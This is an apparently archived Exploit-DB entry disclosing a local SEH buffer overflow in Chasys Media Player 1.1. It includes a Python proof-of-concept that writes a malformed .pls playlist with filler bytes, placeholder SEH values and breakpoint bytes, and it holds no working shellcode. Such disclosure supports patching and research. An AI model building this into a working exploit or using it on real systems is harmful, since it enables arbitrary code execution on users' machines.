Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC

vendor:

Chasys Media Player

by:

zAx

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Chasys Media Player

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: NO

Related CWE: N/A

CPE: a:jpcha2:chasys_media_player

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC

Chasys Media Player 1.1 is vulnerable to a local buffer overflow vulnerability when a specially crafted .pls file is opened. This could allow an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

No known mitigation or remediation is available for this vulnerability.

Source

Exploit-DB raw data:

#!/usr/bin/python
# Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC
# SEH And NEXT_SEH are Overwritten but shellcode doesn't executed !!!
# I have tried a lot of Addresses .
# Waitting for the Exploit from someone .
# Download : http://www.jpcha2.com/setup/chasys_media_player.zip
print "  Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC"
print "  Discovered By : zAx"
print "  Contact : ThE-zAx@Hotmail.Com"
header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3D"
junk = "\x41"*2024
next_seh = "\x42"*4
seh = "\x43"*4
other_data = "\xCC"*800
ex = header + junk + next_seh + seh + other_data
file=open("zAx.pls","w")
file.write(ex)
file.close()

# milw0rm.com [2009-03-18]